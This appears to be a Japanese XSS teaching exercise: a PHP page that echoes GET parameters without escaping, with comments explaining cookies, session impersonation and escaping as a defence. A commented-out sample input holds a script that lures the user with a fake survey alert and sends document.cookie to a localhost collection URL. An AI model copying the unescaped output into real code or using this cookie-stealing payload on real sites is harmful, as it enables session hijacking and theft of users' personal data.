<!DOCTYPE html>
<html lang="ja">
  <head>
    <meta charset="UTF-8">
    <title>新規作成</title>
  </head>
  <body>
    <h1>あなたのcookie情報</h1>
    <ul>
      <?php foreach ($_GET as $item => $content): ?>
        <li>
          <?= $item ?><span>: </span><?= $content ?>
          <!-- 実際表示された内容： -->
          <!-- auth-token: クッキー情報;userId=123 -->
          
          <!-- cookieとは? -->
          <!-- スマホやパソコンの中のブラウザに保存されるWebサイトに関する情報のこと。 -->
          <!-- 例えば、ログイン状態の保持などに使用されます。HTTPは、クライアント側とサーバー側の間でデータの送受信をすることしかできないので、状態を保持出来ません。 -->
          <!-- 何かの状態を保持したい時にはcookieやsessionを利用します。 -->
          <!-- cookieを調べることで、アプリケーション側はアクセスしてきたユーザーがどのようなユーザーなのかを知ることができます。 -->
          <!-- もしcookieが第三者へと渡ってしまうと、その人がcookie情報をもとにユーザーアカウントにログインすることが可能になってしまいます。 -->
          <!-- つまり、ユーザーのなりすましが可能になり、個人情報やクレジットカード情報が流出してしまう恐れがあります。 -->
          
          <!-- XSS対策の一つは、エスケープ処理を施すことです。 -->
          <!-- エスケープ処理を行うことで悪意のあるスクリプトタグを無害化することが出来ます。 -->
        </li>
        <?php endforeach; ?>
      </ul>
      <!-- 入力内容 -->
      <!-- <script>
        if (!alert('今ならアンケート回答で1万円GET！アンケートに答えますか？')) {
          location.href = 'http://localhost:9999/xss.php?' + document.cookie;
        }
      </script> -->
  </body>
</html>